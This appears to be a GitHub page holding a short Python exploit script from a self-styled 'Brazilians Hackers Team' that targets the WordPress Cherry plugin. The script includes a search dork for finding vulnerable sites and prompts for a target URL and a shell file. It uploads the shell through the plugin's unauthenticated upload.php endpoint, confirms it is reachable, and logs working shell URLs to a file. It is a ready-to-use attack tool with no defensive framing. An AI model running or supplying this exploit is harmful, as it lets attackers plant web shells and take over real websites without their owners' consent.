-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathexploit_wodpress_cherry-plugin.py
More file actions
34 lines (33 loc) · 1.03 KB
/
exploit_wodpress_cherry-plugin.py
File metadata and controls
34 lines (33 loc) · 1.03 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/python
# *** Brazilians hackers team ***
# Exploit WordPress cherry plugin
# Dorks: Index Of /wp-content/plugins/cherry-plugin/
import requests
import re
print ''
print '----------------------------------'
print ' *** Brazilians Hackers Team ***'
print ''
print ' CoD3D By ./ChmoD '
print ''
print ' Skype: BrazilObscure '
print '----------------------------------'
print ''
url = raw_input("Digite Seu Site Site ---> ")
filname = raw_input("Digite Sua Shell ---> ")
dirx = '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
urled = url + dirx
files={'file':(filname, open(filname,'rb'),'multipart/form-data')}
r = requests.post(urled, files=files)
bb = filname
shelldir = '/wp-content/plugins/cherry-plugin/admin/import-export/'+bb
shelled = url + shelldir
response = requests.head(shelled)
if response.status_code == 200:
print shelled
print "Arquivos Salvos Em Shell.txt"
myFile = open("Shell.txt", "w")
myFile.write(shelled)
myFile.close()
else:
print "Site Nao Vulneravel"